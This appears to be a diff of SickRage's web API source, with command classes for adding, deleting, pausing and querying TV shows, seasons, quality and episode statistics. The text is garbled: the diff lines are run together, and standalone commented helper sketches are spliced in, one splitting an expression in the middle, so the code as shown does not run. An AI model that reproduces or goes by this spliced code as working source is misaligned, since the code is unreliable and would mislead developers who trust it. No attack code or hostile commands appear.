show_dict[""genre""] = genre_list + show_dict[""quality""] = get_quality_string(show_obj.quality) + + any_qualities, best_qualities = _map_quality(show_obj.quality) + show_dict[""quality_details""] = {""initial"": any_qualities, ""archive"": best_qualities} + + try: + show_dict[""location""] = show_obj.location + except ShowDirectoryNotFoundException: + show_dict[""location""] = """" + + show_dict[""language""] = show_obj.lang + show_dict[""show_name""] = show_obj.name + show_dict[""paused""] = (0, 1)[show_obj.paused] + show_dict[""subtitles""] = (0, 1)[show_obj.subtitles] + show_dict[""air_by_date""] = (0, 1)[show_obj.air_by_date] + show_dict[""flatten_folders""] = (0, 
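# The block above reverse-maps a status name ('wanted', 'skipped', ...) to
# its numeric code by scanning statusStrings, then whitelists the raw values
# (3, 5, 6, 7), which correspond to WANTED, SKIPPED, ARCHIVED and IGNORED in
# this code base. A standalone sketch of the same lookup over a plain dict:
def status_code_from_name_sketch(status_strings, name, allowed=(3, 5, 6, 7)):
    for code, label in status_strings.items():
        if label.lower() == str(name).lower():
            if code not in allowed:
                raise ValueError('status prohibited: %r' % name)
            return code
    raise ValueError('invalid status: %r' % name)

# e.g. status_code_from_name_sketch({3: 'Wanted', 5: 'Skipped'}, 'wanted') == 3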
1)[show_obj.flatten_folders] + show_dict[""sports""] = (0, 1)[show_obj.sports] + show_dict[""anime""] = (0, 1)[show_obj.anime] + show_dict[""airs""] = str(show_obj.airs).replace('am', ' AM').replace('pm', ' PM').replace(' ', ' ') + show_dict[""dvdorder""] = (0, 1)[show_obj.dvdorder] + + if show_obj.rls_require_words: + show_dict[""rls_require_words""] = show_obj.rls_require_words.split("", "") + else: + show_dict[""rls_require_words""] = [] + + if show_obj.rls_ignore_words: + show_dict[""rls_ignore_words""] = show_obj.rls_ignore_words.split("", "") + else: + show_dict[""rls_ignore_words""] = [] + + show_dict[""scene""] = (0, 1)[show_obj.scene] + show_dict[""archive_firstmatch""] = (0, 1)[show_obj.archive_firstmatch] + + show_dict[""indexerid""] = show_obj.indexerid + show_dict[""tvdbid""] = helpers.mapIndexersToShow(show_obj)[1] + show_dict[""imdbid""] = show_obj.imdbid + + show_dict[""network""] = show_obj.network + if not show_dict[""network""]: + show_dict[""network""] = """" + show_dict[""status""] = show_obj.status + + if helpers.tryInt(show_obj.nextaired, 1) > 693595: + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(show_obj.nextaired, show_dict['airs'], show_dict['network'])) + show_dict['airs'] = sbdatetime.sbdatetime.sbftime(dt_episode_airs, t_preset=timeFormat).lstrip('0').replace( + ' 0', ' ') + show_dict['next_ep_airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + show_dict['next_ep_airdate'] = '' + + return _responds(RESULT_SUCCESS, show_dict) + + +class CMD_ShowAddExisting(ApiCall): + _help = { + ""desc"": ""Add an existing show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + ""location"": {""desc"": ""Full path to the existing shows's folder""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""}, + ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, """", []) + self.location, args = self.check_params(args, kwargs, ""location"", None, True, ""string"", []) + # optional + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", + bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", []) + self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", int(sickbeard.USE_SUBTITLES), + False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add an existing show in SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if show_obj: + return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in the database"") + + if not ek(os.path.isdir, self.location): + return 
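# The airdate fields hold proleptic-Gregorian ordinals, so the magic
# threshold 693595 used above (and elsewhere in this file) is the ordinal of
# 1899-12-31; anything larger counts as a real air date. Easy to verify:
import datetime

assert datetime.date(1899, 12, 31).toordinal() == 693595
assert datetime.date(1900, 1, 1).toordinal() == 693596

def has_real_airdate_sketch(airdate_ordinal):
    # mirrors the `tryInt(...) > 693595` guards in the handlers above
    return int(airdate_ordinal) > 693595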
_responds(RESULT_FAILURE, msg='Not a valid location') + + indexer_name = None + indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run() + + if indexer_result['result'] == result_type_map[RESULT_SUCCESS]: + if not indexer_result['data']['results']: + return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"") + if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]: + indexer_name = indexer_result['data']['results'][0]['name'] + + if not indexer_name: + return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"") + + # set indexer so we can pass it along when adding show to SR + indexer = indexer_result['data']['results'][0]['indexer'] + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + + sickbeard.showQueueScheduler.action.addShow( + int(indexer), int(self.indexerid), self.location, default_status=sickbeard.STATUS_DEFAULT, + quality=new_quality, flatten_folders=int(self.flatten_folders), subtitles=self.subtitles, + default_status_after=sickbeard.STATUS_DEFAULT_AFTER, archive=self.archive_firstmatch + ) + + return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"") + + +class CMD_ShowAddNew(ApiCall): + _help = { + ""desc"": ""Add a new show to SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""location"": {""desc"": ""The path to the folder where the show should be created""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + ""flatten_folders"": {""desc"": ""True to flatten the show folder, False otherwise""}, + ""status"": {""desc"": ""The status of missing episodes""}, + ""lang"": {""desc"": ""The 2-letter language code of the desired show""}, + ""subtitles"": {""desc"": ""True to search for subtitles, False otherwise""}, + ""anime"": {""desc"": ""True to mark the show as an anime, False otherwise""}, + ""scene"": {""desc"": ""True if episodes search should be made by scene numbering, False otherwise""}, + ""future_status"": {""desc"": ""The status of future episodes""}, + ""archive_firstmatch"": { + ""desc"": ""True if episodes should be archived when first match is downloaded, False otherwise"" + }, + } + } + + def __init__(self, args, kwargs): + self.valid_languages = sickbeard.indexerApi().config['langabbv_to_id'] + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.location, args = self.check_params(args, kwargs, ""location"", None, False, ""string"", []) + self.initial, args = self.check_params(args, kwargs, 
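# Caveat for the addShow call above: CMD_ShowAddExisting.__init__ never
# assigns self.archive_firstmatch, yet run() forwards it to addShow, so this
# handler can raise AttributeError at request time. A standalone sketch of a
# defensive default (hypothetical helper; a proper fix would parse the
# parameter in __init__ the way CMD_ShowAddNew does below):
def archive_firstmatch_or_default_sketch(api_call, configured_default):
    return getattr(api_call, 'archive_firstmatch', bool(configured_default))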
""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray""]) + self.flatten_folders, args = self.check_params(args, kwargs, ""flatten_folders"", + bool(sickbeard.FLATTEN_FOLDERS_DEFAULT), False, ""bool"", []) + self.status, args = self.check_params(args, kwargs, ""status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + self.lang, args = self.check_params(args, kwargs, ""lang"", sickbeard.INDEXER_DEFAULT_LANGUAGE, False, ""string"", + self.valid_languages.keys()) + self.subtitles, args = self.check_params(args, kwargs, ""subtitles"", bool(sickbeard.USE_SUBTITLES), + False, ""bool"", []) + self.anime, args = self.check_params(args, kwargs, ""anime"", bool(sickbeard.ANIME_DEFAULT), False, + ""bool"", []) + self.scene, args = self.check_params(args, kwargs, ""scene"", bool(sickbeard.SCENE_DEFAULT), False, + ""bool"", []) + self.future_status, args = self.check_params(args, kwargs, ""future_status"", None, False, ""string"", + [""wanted"", ""skipped"", ""ignored""]) + self.archive_firstmatch, args = self.check_params(args, kwargs, ""archive_firstmatch"", + bool(sickbeard.ARCHIVE_DEFAULT), False, ""bool"", []) + + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Add a new show to SickRage """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if show_obj: + return _responds(RESULT_FAILURE, msg=""An existing indexerid already exists in database"") + + if not self.location: + if sickbeard.ROOT_DIRS != """": + root_dirs = sickbeard.ROOT_DIRS.split('|') + root_dirs.pop(0) + default_index = int(sickbeard.ROOT_DIRS.split('|')[0]) + self.location = root_dirs[default_index] + else: + return _responds(RESULT_FAILURE, msg=""Root directory is not set, please provide a location"") + + if not ek(os.path.isdir, self.location): + return _responds(RESULT_FAILURE, msg=""'"" + self.location + ""' is not a valid location"") + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + + # use default status as a fail-safe + new_status = sickbeard.STATUS_DEFAULT + if self.status: + # convert the string status to a int + for status in statusStrings: + if statusStrings[status].lower() == str(self.status).lower(): + self.status = status + break + + if self.status not in statusStrings: + raise ApiError(""Invalid Status"") + + # only allow the status options we want + if int(self.status) not in (WANTED, SKIPPED, IGNORED): + return _responds(RESULT_FAILURE, msg=""Status prohibited"") + new_status = self.status + + # use default status as a fail-safe + 
default_ep_status_after = sickbeard.STATUS_DEFAULT_AFTER + if self.future_status: + # convert the string status to a int + for status in statusStrings: + if statusStrings[status].lower() == str(self.future_status).lower(): + self.future_status = status + break + + if self.future_status not in statusStrings: + raise ApiError(""Invalid Status"") + + # only allow the status options we want + if int(self.future_status) not in (WANTED, SKIPPED, IGNORED): + return _responds(RESULT_FAILURE, msg=""Status prohibited"") + default_ep_status_after = self.future_status + + indexer_name = None + indexer_result = CMD_SickBeardSearchIndexers([], {indexer_ids[self.indexer]: self.indexerid}).run() + + if indexer_result['result'] == result_type_map[RESULT_SUCCESS]: + if not indexer_result['data']['results']: + return _responds(RESULT_FAILURE, msg=""Empty results returned, check indexerid and try again"") + if len(indexer_result['data']['results']) == 1 and 'name' in indexer_result['data']['results'][0]: + indexer_name = indexer_result['data']['results'][0]['name'] + + if not indexer_name: + return _responds(RESULT_FAILURE, msg=""Unable to retrieve information from indexer"") + + # set indexer for found show so we can pass it along + indexer = indexer_result['data']['results'][0]['indexer'] + + # moved the logic check to the end in an attempt to eliminate empty directory being created from previous errors + show_path = ek(os.path.join, self.location, sanitize_filename(indexer_name)) + + # don't create show dir if config says not to + if sickbeard.ADD_SHOWS_WO_DIR: + logger.log(u""Skipping initial creation of "" + show_path + "" due to config.ini setting"") + else: + dir_exists = helpers.makeDir(show_path) + if not dir_exists: + logger.log(u""API :: Unable to create the folder "" + show_path + "", can't add the show"", logger.ERROR) + return _responds(RESULT_FAILURE, {""path"": show_path}, + ""Unable to create the folder "" + show_path + "", can't add the show"") + else: + helpers.chmodAsParent(show_path) + + sickbeard.showQueueScheduler.action.addShow( + int(indexer), int(self.indexerid), show_path, default_status=new_status, quality=new_quality, + flatten_folders=int(self.flatten_folders), lang=self.lang, subtitles=self.subtitles, anime=self.anime, + scene=self.scene, default_status_after=default_ep_status_after, archive=self.archive_firstmatch + ) + + return _responds(RESULT_SUCCESS, {""name"": indexer_name}, indexer_name + "" has been queued to be added"") + + +class CMD_ShowCache(ApiCall): + _help = { + ""desc"": ""Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Check SickRage's cache to see if the images (poster, banner, fanart) for a show are valid """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # TODO: catch if cache dir is missing/invalid.. 
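# CMD_ShowAddNew above only creates the show folder when the
# ADD_SHOWS_WO_DIR setting is off, then mirrors the parent directory's
# permissions via chmodAsParent. A standalone sketch of that guarded
# creation (hypothetical; the real helpers.makeDir also builds intermediate
# directories and fixes ownership):
import os

def ensure_show_dir_sketch(show_path, skip_creation):
    if skip_creation:
        return True  # config says the folder will be created later
    try:
        os.makedirs(show_path)
    except OSError:
        return False  # mirrors the dir_exists failure branch above
    return True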
so it doesn't break show/show.cache + # return {""poster"": 0, ""banner"": 0} + + cache_obj = image_cache.ImageCache() + + has_poster = 0 + has_banner = 0 + + if ek(os.path.isfile, cache_obj.poster_path(show_obj.indexerid)): + has_poster = 1 + if ek(os.path.isfile, cache_obj.banner_path(show_obj.indexerid)): + has_banner = 1 + + return _responds(RESULT_SUCCESS, {""poster"": has_poster, ""banner"": has_banner}) + + +class CMD_ShowDelete(ApiCall): + _help = { + ""desc"": ""Delete a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""removefiles"": { + ""desc"": ""True to delete the files associated with the show, False otherwise. This can not be undone!"" + }, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.removefiles, args = self.check_params(args, kwargs, ""removefiles"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Delete a show in SickRage """""" + error, show = Show.delete(self.indexerid, self.removefiles) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has been queued to be deleted' % show.name) + + +class CMD_ShowGetQuality(ApiCall): + _help = { + ""desc"": ""Get the quality setting of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the quality setting of a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + any_qualities, best_qualities = _map_quality(show_obj.quality) + + return _responds(RESULT_SUCCESS, {""initial"": any_qualities, ""archive"": best_qualities}) + + +class CMD_ShowGetPoster(ApiCall): + _help = { + ""desc"": ""Get the poster of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the poster a show """""" + return { + 'outputType': 'image', + 'image': ShowPoster(self.indexerid), + } + + +class CMD_ShowGetBanner(ApiCall): + _help = { + ""desc"": ""Get the banner of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the banner of a show """""" + return { + 'outputType': 'image', 
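# CMD_ShowCache above reports cached artwork as 0/1 flags by probing the
# image cache paths on disk. A standalone sketch of that check (plain file
# paths here; the real ones come from image_cache.ImageCache):
import os

def cached_artwork_flags_sketch(poster_path, banner_path):
    return {
        'poster': 1 if os.path.isfile(poster_path) else 0,
        'banner': 1 if os.path.isfile(banner_path) else 0,
    }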
+ 'image': ShowBanner(self.indexerid), + } + + +class CMD_ShowGetNetworkLogo(ApiCall): + _help = { + ""desc"": ""Get the network logo of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" + :return: Get the network logo of a show + """""" + return { + 'outputType': 'image', + 'image': ShowNetworkLogo(self.indexerid), + } + + +class CMD_ShowGetFanArt(ApiCall): + _help = { + ""desc"": ""Get the fan art of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the fan art of a show """""" + return { + 'outputType': 'image', + 'image': ShowFanArt(self.indexerid), + } + + +class CMD_ShowPause(ApiCall): + _help = { + ""desc"": ""Pause or un-pause a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""pause"": {""desc"": ""True to pause the show, False otherwise""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.pause, args = self.check_params(args, kwargs, ""pause"", False, False, ""bool"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Pause or un-pause a show """""" + error, show = Show.pause(self.indexerid, self.pause) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has been %s' % (show.name, ('resumed', 'paused')[show.paused])) + + +class CMD_ShowRefresh(ApiCall): + _help = { + ""desc"": ""Refresh a show in SickRage"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Refresh a show in SickRage """""" + error, show = Show.refresh(self.indexerid) + + if error: + return _responds(RESULT_FAILURE, msg=error) + + return _responds(RESULT_SUCCESS, msg='%s has queued to be refreshed' % show.name) + + +class CMD_ShowSeasonList(ApiCall): + _help = { + ""desc"": ""Get the list of seasons of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""sort"": {""desc"": ""Return the seasons in ascending or descending order""} + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, 
""indexerid"", None, True, ""int"", []) + # optional + self.sort, args = self.check_params(args, kwargs, ""sort"", ""desc"", False, ""string"", [""asc"", ""desc""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the list of seasons of a show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + if self.sort == ""asc"": + sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season ASC"", + [self.indexerid]) + else: + sql_results = my_db.select(""SELECT DISTINCT season FROM tv_episodes WHERE showid = ? ORDER BY season DESC"", + [self.indexerid]) + season_list = [] # a list with all season numbers + for row in sql_results: + season_list.append(int(row[""season""])) + + return _responds(RESULT_SUCCESS, season_list) + + +class CMD_ShowSeasons(ApiCall): + _help = { + ""desc"": ""Get the list of episodes for one or all seasons of a show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""season"": {""desc"": ""The season number""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + self.season, args = self.check_params(args, kwargs, ""season"", None, False, ""int"", []) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get the list of episodes for one or all seasons of a show """""" + sho_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not sho_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + my_db = db.DBConnection(row_type=""dict"") + + if self.season is None: + sql_results = my_db.select( + ""SELECT name, episode, airdate, status, release_name, season, location, file_size, subtitles FROM tv_episodes WHERE showid = ?"", + [self.indexerid]) + seasons = {} + for row in sql_results: + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + row[""status""] = _get_status_strings(status) + row[""quality""] = get_quality_string(quality) + if helpers.tryInt(row['airdate'], 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network)) + row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + row['airdate'] = 'Never' + cur_season = int(row[""season""]) + cur_episode = int(row[""episode""]) + del row[""season""] + del row[""episode""] + if cur_season not in seasons: + seasons[cur_season] = {} + seasons[cur_season][cur_episode] = row + + else: + sql_results = my_db.select( + ""SELECT name, episode, airdate, status, location, file_size, release_name, subtitles FROM tv_episodes WHERE showid = ? 
AND season = ?"", + [self.indexerid, self.season]) + if len(sql_results) == 0: + return _responds(RESULT_FAILURE, msg=""Season not found"") + seasons = {} + for row in sql_results: + cur_episode = int(row[""episode""]) + del row[""episode""] + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + row[""status""] = _get_status_strings(status) + row[""quality""] = get_quality_string(quality) + if helpers.tryInt(row['airdate'], 1) > 693595: # 1900 + dt_episode_airs = sbdatetime.sbdatetime.convert_to_setting( + network_timezones.parse_date_time(row['airdate'], sho_obj.airs, sho_obj.network)) + row['airdate'] = sbdatetime.sbdatetime.sbfdate(dt_episode_airs, d_preset=dateFormat) + else: + row['airdate'] = 'Never' + if cur_episode not in seasons: + seasons[cur_episode] = {} + seasons[cur_episode] = row + + return _responds(RESULT_SUCCESS, seasons) + + +class CMD_ShowSetQuality(ApiCall): + _help = { + ""desc"": ""Set the quality setting of a show. If no quality is provided, the default user setting is used."", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + ""initial"": {""desc"": ""The initial quality of the show""}, + ""archive"": {""desc"": ""The archive quality of the show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # this for whatever reason removes hdbluray not sdtv... which is just wrong. reverting to previous code.. plus we didnt use the new code everywhere. + # self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", _get_quality_map().values()[1:]) + self.initial, args = self.check_params(args, kwargs, ""initial"", None, False, ""list"", + [""sdtv"", ""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", ""hdbluray"", ""fullhdbluray"", ""unknown""]) + self.archive, args = self.check_params(args, kwargs, ""archive"", None, False, ""list"", + [""sddvd"", ""hdtv"", ""rawhdtv"", ""fullhdtv"", ""hdwebdl"", + ""fullhdwebdl"", + ""hdbluray"", ""fullhdbluray""]) + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Set the quality setting of a show. If no quality is provided, the default user setting is used. 
"""""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + quality_map = {'sdtv': Quality.SDTV, + 'sddvd': Quality.SDDVD, + 'hdtv': Quality.HDTV, + 'rawhdtv': Quality.RAWHDTV, + 'fullhdtv': Quality.FULLHDTV, + 'hdwebdl': Quality.HDWEBDL, + 'fullhdwebdl': Quality.FULLHDWEBDL, + 'hdbluray': Quality.HDBLURAY, + 'fullhdbluray': Quality.FULLHDBLURAY, + 'unknown': Quality.UNKNOWN} + + # use default quality as a fail-safe + new_quality = int(sickbeard.QUALITY_DEFAULT) + i_quality_id = [] + a_quality_id = [] + + if self.initial: + for quality in self.initial: + i_quality_id.append(quality_map[quality]) + if self.archive: + for quality in self.archive: + a_quality_id.append(quality_map[quality]) + + if i_quality_id or a_quality_id: + new_quality = Quality.combineQualities(i_quality_id, a_quality_id) + show_obj.quality = new_quality + + return _responds(RESULT_SUCCESS, + msg=show_obj.name + "" quality has been changed to "" + get_quality_string(show_obj.quality)) + + +class CMD_ShowStats(ApiCall): + _help = { + ""desc"": ""Get episode statistics for a given show"", + ""requiredParameters"": { + ""indexerid"": {""desc"": ""Unique ID of a show""}, + }, + ""optionalParameters"": { + ""tvdbid"": {""desc"": ""thetvdb.com unique ID of a show""}, + } + } + + def __init__(self, args, kwargs): + # required + self.indexerid, args = self.check_params(args, kwargs, ""indexerid"", None, True, ""int"", []) + # optional + # super, missing, help + ApiCall.__init__(self, args, kwargs) + + def run(self): + """""" Get episode statistics for a given show """""" + show_obj = Show.find(sickbeard.showList, int(self.indexerid)) + if not show_obj: + return _responds(RESULT_FAILURE, msg=""Show not found"") + + # show stats + episode_status_counts_total = {""total"": 0} + for status in statusStrings: + if status in [UNKNOWN, DOWNLOADED, SNATCHED, SNATCHED_PROPER, ARCHIVED]: + continue + episode_status_counts_total[status] = 0 + + # add all the downloaded qualities + episode_qualities_counts_download = {""total"": 0} + for statusCode in Quality.DOWNLOADED + Quality.ARCHIVED: + status, quality = Quality.splitCompositeStatus(statusCode) + if quality in [Quality.NONE]: + continue + episode_qualities_counts_download[statusCode] = 0 + + # add all snatched qualities + episode_qualities_counts_snatch = {""total"": 0} + for statusCode in Quality.SNATCHED + Quality.SNATCHED_PROPER: + status, quality = Quality.splitCompositeStatus(statusCode) + if quality in [Quality.NONE]: + continue + episode_qualities_counts_snatch[statusCode] = 0 + + my_db = db.DBConnection(row_type=""dict"") + sql_results = my_db.select(""SELECT status, season FROM tv_episodes WHERE season != 0 AND showid = ?"", + [self.indexerid]) + # the main loop that goes through all episodes + for row in sql_results: + status, quality = Quality.splitCompositeStatus(int(row[""status""])) + + episode_status_counts_total[""total""] += 1 + + if status in Quality.DOWNLOADED + Quality.ARCHIVED: + episode_qualities_counts_download[""total""] += 1 + episode_qualities_counts_download[int(row[""status""])] += 1 + elif status in Quality.SNATCHED + Quality.SNATCHED_PROPER: + episode_qualities_counts_snatch[""total""] += 1 + episode_qualities_counts_snatch[int(row[""status""])] += 1 